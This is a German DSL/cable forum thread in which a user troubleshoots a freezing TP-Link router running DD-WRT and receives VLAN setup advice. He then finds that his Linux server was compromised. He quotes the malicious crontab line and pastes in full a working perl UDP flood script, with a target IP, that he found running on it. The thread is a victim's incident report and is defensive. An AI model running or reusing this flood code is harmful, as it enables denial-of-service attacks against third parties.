- Anzeige -

Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Alles über DOCSIS 3.0

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitragvon david_ffm » 07.03.2011, 23:06

addicted hat geschrieben:Sorry, da hast Du mich missverstanden - VLAN war nicht ganz ernst gemeint und lediglich als Alternative zu mehreren Netzwerkkarten in Deinem Server gedacht. Es gibt keine mir bekannten speziellen VLAN Router. VLAN-Unterstützung wird in einen Switch eingebaut, einen Router brauchst Du weiterhin (in dem Fall dann Deinen Server, aber da warst Du ja eher abgeneigt).

Ich verstehe aber nicht, wie mir da ein VLAN switch mehr hilft als ein normales switch. VLAN scheint für
den Fall gedacht dass man mehrere LANS hat und die nicht unbedingt durch physikalischen netzwerk-Segmente
definieren will. Das wäre sehr praktisch in dem Fall aber ich habe und brauche ja nur eine LAN.

addicted hat geschrieben:Hat sich der DD-WRT Support mal Logfiles oder sowas schicken lassen?

Verstehe ich nicht ganz - welche logfiles sollen sie schicken? Oder ich? Ich denke nicht, dass es da Support
gibt, höchstens kann man so wie hier in dem Forum posten.
david_ffm
Kabelneuling
 
Beiträge: 20
Registriert: 25.11.2010, 10:34

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitragvon addicted » 08.03.2011, 12:15

david_ffm hat geschrieben:Ich verstehe aber nicht, wie mir da ein VLAN switch mehr hilft als ein normales switch.

Vergiss das VLAN. Es ging darum, dass Du in Deinen Server eine zweite NIC einbauen wolltest, und ihn dann als Router verwendest. Wenn Du das nichtmehr vor hast, musst Du auch nicht über VLAN nachdenken.


david_ffm hat geschrieben:
addicted hat geschrieben:Hat sich der DD-WRT Support mal Logfiles oder sowas schicken lassen?

Verstehe ich nicht ganz - welche logfiles sollen sie schicken? Oder ich? Ich denke nicht, dass es da Support
gibt, höchstens kann man so wie hier in dem Forum posten.

Tjaaaa ... ;)
addicted
Glasfaserstrecke
 
Beiträge: 2007
Registriert: 15.03.2010, 03:35
Wohnort: Paderborn

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitragvon david_ffm » 08.03.2011, 15:51

addicted hat geschrieben:Vergiss das VLAN. Es ging darum, dass Du in Deinen Server eine zweite NIC einbauen wolltest, und ihn dann als Router verwendest. Wenn Du das nichtmehr vor hast, musst Du auch nicht über VLAN nachdenken.

Ja, das hatte ich auch so verstanden, und das überlege ich immer noch als Option. Eine laufende linux-Kiste
wo man voll darauf zugreifen kann auch mit Konsole hängt sich nicht einfach so auf, oder wenn er das doch
tut, hat man ganz andere Möglichkeiten das Problem zu analysieren. Der Linux Kernel und insbesondereund
TCP-IP-Stack sind sehr ausgereift, getestet und stabil, was man nicht unbedingt für DD-WRT sagen kann.
Aber wie wurde mir da die VLAN Switch helfen?
david_ffm
Kabelneuling
 
Beiträge: 20
Registriert: 25.11.2010, 10:34

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitragvon addicted » 08.03.2011, 16:09

Oki, also die Details :)


Ein VLAN-fähiger Switch kann einzelnen Hardware-Ports VLAN-Markierungen zuweisen. Im Wesentlichen sortiert er seine Ports in unterschiedliche Netze. Man kann aber auch einen Port in mehrere Netze hängen.

Hier zunächst das Setup:
Für alle Switchports legst Du ein Default-VLAN an, z.B. "1". Jetzt legst Du ein weiteres VLAN an, z.B. "42", und weist diesem einen Port am Switch zu. Das Default-VLAN entfernst Du von diesem Port, und dann schließt Du das Kabelmodem daran an. Dann legst Du den Port an dem Dein Linuxserver hängt zusätzlich in VLAN 42, so dass dieser also in beiden VLANs, "1" und "42", ist. Setze auf dem Port für Pakete mit fehlender VLAN-Markierung noch das Default VLAN "1" als Ziel.
Auf dem Linuxserver konfigurierst Du Dir nun ein virtuelles Interface, z.B. "vlan42", welches als VLAN-Interface mit der VLAN-Markierung "42" auf dem normalen Ethernet Interface (z.B. "eth0") aufsetzt.

Was jetzt passiert:
Jetzt kann der Linuxserver über dieses Interface direkt mit dem Modem reden, ohne eine weitere NIC zu benötigen. Sendet er aber Pakete auf eth0, setzt der Switch diese automatisch auf VLAN 1, welches nicht an den Port zum Kabelmodem gesendet wird, sondern nur an die anderen LAN Ports. Ankommende Pakete mit VLAN "1" sollten an eth0 anliegen, sofern kein zugehöriges VLAN-Interface existiert.
Auf vlan42 kannst Du ganz normal DHCP machen, und bekommst direkt auf dem Server die öffentliche IP-Adresse mit allen Vorteilen (z.B. Proto41 für IPv6) und Nachteilen (Portscans, Bruteforce, etc.).
addicted
Glasfaserstrecke
 
Beiträge: 2007
Registriert: 15.03.2010, 03:35
Wohnort: Paderborn

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitragvon karl99 » 08.03.2011, 17:42

cu
karl
Benutzeravatar
karl99
Kabelneuling
 
Beiträge: 11
Registriert: 02.04.2010, 19:28

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitragvon david_ffm » 09.03.2011, 10:58

addicted hat geschrieben:Oki, also die Details :)
...

Besten Dank dass du dir Zeit für die Erklärung genommen hast - das wäre tatsächlich eine interessante Lösung.
Wie ist es aber dann mit den anderen Clients, die ins internet wollen? Die hängen im VLAN1, bekommen per DHCP eine IP vom Server,
vermutlich auch default Gateway und DNS. Aber auf dem Server muss dann bridging oder routing auch konfiguriert sein zwischen vlan42
und eth0, oder? Und wie wurde ich dann WLAN bekommen? Ein Access Point auch im VLAN1 hängen, oder gibt es VLAN switches die auch
WLAN haben?
Jetzt suche ich nach einem preiswerten VLAN Router - der D-Link DES-3624i gibt es gebraucht bei eBay für EUR50, hat auch reichlich ports
nur laut Handbuch könnte der Stromverbrauch schon bei 48W liegen, das ist mehr als der Linux Server selbst und schon viel für den
dauerbetrieb zuhause.

Ich habe heute morgen aber auch weiteres zum ursprunglichen Problem beobachten können. Ich habe den TP-Link wr1043nd wieder auf
ursprungliche Firmware zurückgestellt, dennoch hat er sich in der Nacht aufgehängt, Symptome genau wie unter DD-WRT. Ich habe alles
abgestöpselt bis auf Modem und einem PC, dann ginge alles. Langsam alles wieder reingesteckt und festgestellt, sobald ich mein Server
anschliesse ist der Router nicht mehr ansprechbar! Server abgekoppelt, geht alles wieder. Server ist ein ganz normale linux-Kiste mit
SuSe 11 und eine xampp Installation, apache, mysql usw., auch fhem Heimautomation - keine Ahnung, wie er es schafft den Router
runterzuziehen aber so siehts aus im Moment. Ein rootkit virus?! Sobald ich Zeit habe werde ich den Server genauestens anschauen,
was da in solchen Fällen abgeht.

@Karl: Besten Dank, von da hatte ich auch meine DD-WRT - was ich nicht so ganz kappiere ist wieso in meinem Router v24 sp2 steht
und die neueste V24 sp1 ist?! Naja, egal, ich denke nach dem Experiment von heute, dass das Problem doch nicht bei DD-WRT liegt,
und ich werde auch dazu zurückgehen - die erweiterete Funktionalität ist unwiederstehlich ;-)
david_ffm
Kabelneuling
 
Beiträge: 20
Registriert: 25.11.2010, 10:34

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitragvon addicted » 09.03.2011, 15:51

david_ffm hat geschrieben:Wie ist es aber dann mit den anderen Clients, die ins internet wollen?

Wie Du schon schriebst, musst Du dann NAT und Forwarding auf dem Server aktivieren. Ich ging davon aus, dass Du das wusstest, weil es bei Deiner ursprünglichen Idee mit mehreren NICs im Server ja auch nötig ist.
Du kannst einen WLAN-Accesspoint oder einen Router im Accesspoint-/Bridge-Modus einfach mit an den Switch stecken, der landet dann im VLAN 1 wie die kabelgebundenen Geräte auch. Wenn Du einen Usecase dafür hast, könntest Du auch ein eigenes VLAN für Dein WLAN definieren und dass ebenfalls auf dem Server konfigurieren, dann kannst Du für WLAN-Clients z.b. andere Regeln definieren als für Dein LAN (und insbesondere auch WLAN und LAN voneinander trennen).

Ich würde es an Deiner Stelle nicht zu kompliziert machen. Ich kenne es von mir selbst, dass man sauviel Arbeit in das Setup investiert, es dann aber im alltäglichen Betrieb garnicht benötigt, aber wenn mal was schiefgeht benötigt man wieder viel Zeit für die Fehlersuche, weil alles so komplex ist.

Vielleicht baut Dein Server zuviele parallele Verbindungen auf? Nicht alle Hardwarerouter kommen damit zurecht.
addicted
Glasfaserstrecke
 
Beiträge: 2007
Registriert: 15.03.2010, 03:35
Wohnort: Paderborn

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitragvon david_ffm » 09.03.2011, 21:34

addicted hat geschrieben:
david_ffm hat geschrieben:Wie ist es aber dann mit den anderen Clients, die ins internet wollen?

Vielleicht baut Dein Server zuviele parallele Verbindungen auf? Nicht alle Hardwarerouter kommen damit zurecht.


Nicht zu fassen - ich habe tatsächlich auf dem Linux Server etwas böses eingefangen!
Im Crontab von nobody steht:
* * * * * /tmp/.dada/.s.s/update >/dev/null 2>&1
(wird also jede Minute ausgeführt)
Im Prozessraum war zu sehen:
nobody 9257 5434 99 16:49 ? 01:53:59 /usr/bin/perl ./x 92.114.4.17 0 0
der annährend 100% CPU verbraucht...
und dann gibt es eine Datei /tmp/.dada/.s.s/x die so aussieht wie unten.
Klar, wenn man die "for (;;)" Schleife anschaut, dass so etwas jeden Router zerhauen kann!
Jetzt muss ich erstmal schauen, wie ich das wegkriege und wie ich mich für eine Neuinfektion
schutzen kann - wenn der Server überhaupt noch zu retten ist. Naja, ganz so raffiniert scheint
es nicht zu sein, ist auf jeden Fall kein stuxnet ;-)


#!/usr/bin/perl

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "Slashing SirVic's server on victim...\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 x) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
david_ffm
Kabelneuling
 
Beiträge: 20
Registriert: 25.11.2010, 10:34

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitragvon addicted » 09.03.2011, 23:19

Jap, das könnte es gewesen sein ;)
Das Script auf hax.asia. Die gebombte IP scheint in Rumänien vergeben zu sein.
Naja, viel Spaß bei der Neuinstallation.
addicted
Glasfaserstrecke
 
Beiträge: 2007
Registriert: 15.03.2010, 03:35
Wohnort: Paderborn

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitragvon piotr » 10.03.2011, 00:36

Brauchst Du wirklich PHP oder geht es auch ohne?

Wenn PHP nicht sicher genug konfiguriert ist und/oder die PHP-Applikation nicht auf dem aktuellen Stand ist, dann ist recht einfach ueber PHP Exploits Dein aus dem Internet erreichbares Linux-System zu uebernehmen.

Teilweise reicht es bereits aus zu wissen welche PHP-Version installiert ist... das bekommt man mit der Default PHP-Konfiguration sehr schnell raus. Auch ohne dass Du es irgendwo in Deiner PHP-Applikation anzeigst.

Viel Spass beim Lesen:
http://www.heise.de/security/artikel/Gr ... 70918.html
piotr
Glasfaserstrecke
 
Beiträge: 2209
Registriert: 13.08.2008, 18:26

VorherigeNächste

Zurück zu DOCSIS 3.0 - bis zu 400 Mbit/s

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 6 Gäste